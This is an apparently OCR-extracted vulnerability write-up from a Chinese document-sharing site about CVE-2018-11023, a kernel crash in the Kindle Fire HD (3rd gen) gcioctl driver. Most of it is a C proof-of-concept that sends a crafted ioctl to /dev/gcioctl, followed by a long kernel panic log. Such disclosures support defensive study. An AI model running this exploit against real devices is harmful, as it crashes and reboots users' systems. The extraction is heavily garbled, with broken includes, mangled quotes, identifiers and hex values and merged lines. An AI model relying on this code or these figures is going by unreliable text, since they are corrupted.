《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(7页珍藏版)》请在三一办公上搜索。
1、(CVE-2018-11023) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令3222560159,并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in t
2、he ioctl interface of device file devgcioctl causes the system crash via IOCTL 3222560159.* This Poc should run with permission to do ioctl on devgcioctl.*/#include #include #include #include const static char *driver = ,devgcioctl;static command = 3222560159;int main(int argcj char *argv, char *env
3、) unsigned int payload = 0x244085aa, 0la03e6ef 0x000003f4, 0x00000000 ;int fd = 0;fd = OPen(driver, O_RDONLY);if (fd datalocaltmplog);return -1;printf(Try open %s with command 0x%x.n”, driver, command); printf(System will crash and reboot.n);if(ioctl(fd command, Spayload) datalocaltmplog);return -1;
4、close(fd);return 0;崩溃日志79.825592 init: untracked pid 3232 exited79.830841 init: untracked pid 3234 exited95.970855 Alignment trap: not handling instruction el953f9f at f395.978912 Unhandled fault: alignment exception (0001) at 0xla03e695.986053 Internal error: : 1 #1 PREEMPT SMP ARM95.991638 Modules
5、 linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)1)95.999145 CPU: 0 Tainted: GO (3.4.83-gd2afc0bae69 #96.006408 PC is at _raw_spin_lock_irqsave+0x38/0xb096.012115 LR is at _raw_spin_lock_irqsave+0xl0/0xl496.017791 pc : lr: psr: 2000009396.017822 sp : d02bfdd8 ip : d02bfdf8 fp : d02bfdf496.030578 rl0:
6、 00000000 r9 : dd3eeca8 r8 : 000000010096.036376 r7 : Ia03e6ef r6 : 00000001 r5 : Ia03e6f3 r4 : d02be0 1396.043701 r3 : 00000001 r2 : 00000001 rl : 00000082 r0 : 20000096.050933 Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user96.058990 Control: 10c5387d Table: 96cb804a DAC: 0000001596.0
7、6546096.065460 PC: 0xc06a4d08:96.070404 4d08 la000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004e3530000996.080810 4d28 eaffffdf e50b0018 ebfffbab e51b0018 eaffffed ela0c00de92dd800 e24cb00496.091217 4d48 ebffffcf e89da800 ela0c00d e92dd878 e24cb004 ela0300de3c34d7f e3c4403f96.101776 4d68 ela05000
8、 e3a06001 e5943004 e2833001 e5843004 el0f0000fl0c0080 el953f9f96.112335 4d88 e3330000 01853f96 e3530000 0a000014 el21f000 e5943004e2433001 e584300496.122894 4da8 e5943000 e3130002 la000010 e5953004 e3530000 e595300005856004 e353000096.133361 4dc8 la000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004
9、e3530000 Iafffff996.143920 4de8 eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffeeela0c00d e92dd80096.15447996.154479 LR: 0xc06a4d90:96.159393 4d90 e3530000 0a000014 el21f000 e5943004 e2433001 e5843004 e5943000 e313000296.170013 4db0 la000010 e5953004 e3530000 e5953000 05856004 e3530000 la000003
10、eaffffe796.180603 4dd0 e5953000 e3530000 0affffe4 e5953004 e3530000 Iafffff9 eaffffe0 f57ff05f96.191070 4df0 e5853004 e89da878 ebfffb79 eaffffec ela0c00d e92dd800 e24cb004 ebffffcf96.201690 4el0 e89da800 ela0c00d e92dd800 e24cb004 ebfffff6 e89da800 ela0c00d e92dd80096.212341 4e30 e24cb004 ebfffffl e
11、89da800 ela0c00d e92dd818 e24cb004 ebffffc0 ela0400096.222808 4e50 ebe6a978 el21f004 e89da818 ela0c00d e92dd800 e24cb004 ebfffff3 e89da80096.233612 4e70 ela0c00d e92dd830 e24cb004 e24dd008 ela0300d e3c34d7f e3c4403f e3a0500196.24426296.244262 SP: 0xd02bfd58:96.249145 fd58 00000000 0000001d 00000004
12、d4736f80 d4737394 C06a4d84 20000093 ffffffff96.259948 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.270660 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.281311 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 C06a4el0 C06a4d88 20000093 ffffff
13、ff96.292053 fdd8 0000020a 00000082 Ia03e6f3 d02be000 d02bfe04 d02bfdf8 C06a4el0 C06a4d5c96.302825 fdf8 d02bfel4 d02bfe08 C06a4e24 C06a4e0c d02bfe5c d02bfel8 C06a3008 C06a4e2096.313415 fel8 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 Ia03e6ef96.323883 fe38 bed24608 d02b000 d627f000
14、 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe6096.33453396.334533 IP: 0d02bfd78:96.339416 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.349853 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.360290 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8
15、 C06a4el0 C06a4d88 20000093 ffffffff96.370727 fdd8 0000020a 00000082 Ia03e6f3 d02be000 d02bfe04 d02bfdf8 C06a4el0 C06a4d5c96.381042 fdf8 d02bfel4 d02bfe08 C06a4e24 C06a4e0c d02bfe5c d02bfel8 C06a3008 C06a4e2096.391479 fel8 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 Ia03e6ef96.402
16、008 fe38 bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe6096.412445 fe58 C06a319cc06a2fecd02bff04d02bfe70C0317c28c06a3194 00000001 0000002896.42279096.422790 FP: 0xd02bfd74:96.427795 fd74 ffffffffd02bfdc400000001d02bfdf4d02bfd90C06a5318 C0008370 20000013 96.438140 fd94 00000082
17、0000000100000001d02be000Ia03e6f300000001 Ia03e6ef 0000000196.448699 fdb4 dd3eeca800000000d02bfdf4d02bfdf8d02bfdd8C06a4el C06a4d88 2000009396.459289 fdd4 ffffffff0000020a00000082Ia03e6f3d02be000d02bfe04 d02bfdf8 C06a4el096.470031 fdf4 C06a4d5cd02bfel4d02bfe08C06a4e24C06a4e0cd02bfe5c d02bfel8 C06a3008
18、96.480438 fel4 C06a4e20d84a38d8d84a2800d84a38000000000ad02be000 c33a3180 d02bfe5496.490875 fe34 Ia03e6efbed24608d02be000d627f000bed24608dd3eeca800000000 d02bfe6c96.501495 fe54 d02bfe60c06a319cc06a2fecd02bff04d02bfe70c0317c28 C06a3194 0000000196.51202396.512023 R4: 0xd02bdf80:96.517089 df80 000003ef6
19、1ef22a861ef227861ef22d800000036c0013e0800000000 d02bdfa896.527679 dfa0 C0013c60C013657861ef22a861ef22780000000aC018620165490ce8 65490ce096.538208 dfc0 61ef22a861ef227861ef22d8000000360000000165393000 6253ab8c 4010f2ec96.548797 dfe0 0000000165490cd0400f0273400e3804600f00100000000a 5788flb0 0000000b96
20、.559356 e000 000000020000000300000000d4736f80C0a0e84000000000 00000015 c4fcf88096.569885 020 00000000d02b6000c09ddc50d4736f80dd0be600C1617b40 d02bfdf4 d02bfd4096.580535 e040 C06a36e4000000000000000000000000000000000000000001000000 0000000096.591125 e060 005bc4c05ebfea7f000000000000000000000000000000
21、00 00000000 0000000096.60168496.601684 R9: 0xdd3eec28:96.606628 ec28 dd3eec28dd3eec28000000000000000000000000c06bc674 000200da C09dda5896.617218 ec48 0000000000000000dd3eec50dd3eec5000000000C0aa5174 C0aa5174 C0aa5148 96.627716 ec68 5aefd4d7000000000000000000000000dd3eec8000000000 00000000 0000000096
22、.638275 ec88 002000000000000000000000dd3eec94dd3eec94dd3d6fc0dd3d6fc0 0000000096.648864 eca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 C06b9600 ddl5040096.659423 ecc8 dd3eed80 dd33ae70 00001064 00000001 0fb00000 5aefd4d7 2d2b4dl5 5aefd4d796.669921 ece8 2d2b4dl5 5aefd4d7 2d2b4dl5 00000000
23、 00000000 00000000 00000000 0000000096.680572 ed08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dd3eed2496.691162 Process gcioctl_poc_3 (pid: 3395, stack limit = 0xd02be2f8)96.698455 Stack: (0d02bfdd8 to 0xd02c0000)96.703430 fdc0: 0000020a 0000008296.712554 fde0: Ia03e6f3 d02be000
24、d02bfe04 d02bfdf8 C06a4el0 C06a4d5c d02bfel4 d02bfe0896.721588 fe00: C06a4e24 C06a4e0c d02bfe5c d02bfel8 C06a3008 C06a4e20 d84a38d8 d84a280096.730743 fe20: d84a3800 0000000a d02be000 c33a3180 d02bfe54 la03e6ef bed24608 d02be00096.739837 fe40: d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60c06a
25、319c c06a2fec96.748840 fe60: d02bff04 d02bfe70 c0317c28 C06a3194 00000001 00000028 000fffff d02bfea096.757934 fe80: d02bfedc d02bfe90 c0207454 C00bd920 0000001e c33a3180d02bfed4 d02bfea896.767059 fea0: 244085aa Ia03e6ef 000003f4 00000000 00000000 00000001 00000000 d02bffl496.776214 fec0: 00000000 00
26、000001 dd3eeca8 c24d8a00 d02bfefc d02bfeec02089fc 0000000096.785247 fee: d627f000 00000004 d627f000 bed24608 dd3eeca8 00000000 d02bff74 d02bff0896.794403 ff00: C0136044 C0317448 00000000 00000000 00000000 00000001 00000000 dd04519096.803649 ff20: dcf8c770 d02bff0c d02b000 bed24638 bed24608 C0145d9fd
27、627f000 0000000496.812744 ff40: d02b6000 00000000 d02bff64 00000000 bed24608 C0145d9f d627f000 0000000496.821746 ff60: d02be000 00000000 d02bffa4 d02bff78 C01365e0 c0135fc4 00000000 0000000096.830932 ff80: 00000400 bed24638 00010e54 00000000 00000036 C0013e0800000000 d02bffa896.840118 ffa0: C0013c60
28、 C0136578 bed24638 00010e54 00000004 C0145d9f bed24608 bed2460896.849121 ffc: bed24638 00010e54 00000000 00000036 00000000 00000000 00000000 bed2462496.858245 ffe: 00000000 bed245ec 00010690 0002917c 60000010 00000004006f0063 002e006d96.867340 Backtrace:96.870330 (_raw_spin_lock_inqsave+0x0/0xb0) fr
29、om (_raw_spin_lock_irqsave+0xl0/0xl4)I 96.881591r6:d02be000 r5:la03e6f3 r4:00000082 r3:0000020a96.888488 (_raw_spin_lock_irqsave+0x0/0xl4) from (_raw_spin_lock_irq+0xl0/0xl4)96.899291 (_raw_spin_lock_irq+0x0/0xl4) from (wait_for_common+0x28/0xl50)96.909729 (wait_for_common+0x0/0xl50) from (wait_for_
30、completion_interruptible_timeout+0xl4/0xl8)96.922149 (wait_for_completion_interruptible_timeout+0x0/0x18) from (dev_ioctl+0x7ec/0xl0c4)96.934204 (dev_ioctl+0x0/0xl0c4) from (dO_vfs_ioctl+0x8c/0x5b4)96.943481 (do_vfs_ioctl+0x0/0x5b4) from (sys_ioctl+0x74/0x84)96.952636 (sys-ioctl+0x0084) from (ret_fa
31、st_syscall+0x0/0x30)96.961822r8:c0013e08 7:00000036 r6:00000000 r5:00010e54 r4:bed2463896.970153Code: e5843004 el0f0000 fl0c0080 el953f9f (e3330000)96.977264Board Information:96.977264Revision : 000196.977294Serial: 000000000000000096.977294SoC Information:96.977294CPU: OMAP447096.977294Rev: ES1.096
32、.977325Type : HS96.977325Production ID: 0002B975-000000CC96.977325Die ID: 1CC60000-50002FFF-0B00935D-1100700496.97735597.013824end trace 2432291f2b5d99ba 97.019195Kernel panic - not syncing: Fatal exception97.025024CPUl: stopping97.028137Backtrace:97.031311 (dump-backtrace+00010c) from (dump_stack+0
33、xl8/0xlc)97.040679r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e95097.047668 (dump_stack+0x0/0xlc) from (handle_IPI+0xl90/0xlc4)97.056884 (handle_IPI+0x0/0xlc4) from (gic_handle_irq+0x58/0x60)97.066253 (gic_handle_irq+0x0/0x60) from (_irq_svc+0x40/0x70)97.075561Exception stack(0d6cb7d28 to 0xd6cb7d70)
34、97.0812377d20:C1620b40 c3152ac0 d799dc70 0000000000000000 C1620b4097.0904547d40: d6cb6000 c4eaaf80 00000001 c4eaaf80 C1620b40 d6cb7d7cd6cb7d80 d6cb7d7097.0996707d60: C0074004 C06a4880 60070013 ffffffff97.105346r6Iffffffff r5:60070013 r4:c06a4880 r3:c007400497.112487 (_raw_spin_unlock_irq+0x0/0x50) f
35、rom (finish_task_switch+0x58/0xl2c)97.123321 (finish_task_switch+0x0/0xl2c) from (_schedule+0x3ec0830)97.133239 r8:c3152ac0 r7:c09ddc50 r6:d6cb6000 r5:c09b6b40 r4:c4fcf34097.141143 r3:00000001I97.144500 (_schedule+0x0/0x830) from (preempt-schedule+0400x5c)97.154174 (preempt_schedule+0x0/0x5c) from (
36、_raw_spin_unlock+0x48/0x4c)97.164337 r4:c0a7375cr3:00000002 097.168731 (futex_wake+0xfc/0xl30)(_raw_spin_unlock+0x0/0x4c) from c00983d97.178436 o-futex+0xf809e8)(futex-wake+000xl30) from (d 97.187469 _futex+0x94/0xl78)(do-fute+000x9e8) from (sys97.196289 t_fast_syscall+0x0/0x30)(sys_futex+000178) fr
37、om (re97.205871 CPU0 PC (0)0xc003ee3897.209930 CPU0 PC (1)0xc003ee5497.214111 CP0 PC (2)0xc003ee5497.218170 CP0 PC (3)0xc003ee5497.222229 CPU0 PC (4)0c003ee5497.226409 CPU0 PC (5)0c003ee5497.230468 CPU0 PC (6)0xc003ee5497.234527 CPU0 PC (7)0xc003ee5497.238739 CPU0 PC (8)0xc003ee5497.242767 CPU0 PC (
38、9)0xc003ee5497.246826 CPUl PC (0)0xc0019b2c97.251007 CPUl PC (1)0xc0019b2c97.255065 CPUl PC (2)0c0019b2c97.259124 CPUl PC (3)0c0019b2c97.263183 CPUl PC (4)0c0019b2c97.267364 CPUl PC (5)0xc0019b2c97.271423 CPUl PC (6)0xc0019b2c97.275482 CPUl PC (7)0xc0019b2c97.279693 CPUl PC (8)0xc0019b2c97.283752 CPUl PC (9)0xc0019b2c97.28781197.289581 Restarting Linux version 3.4.83-gd2afc0bae69 (build14-usela-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 201797.289611
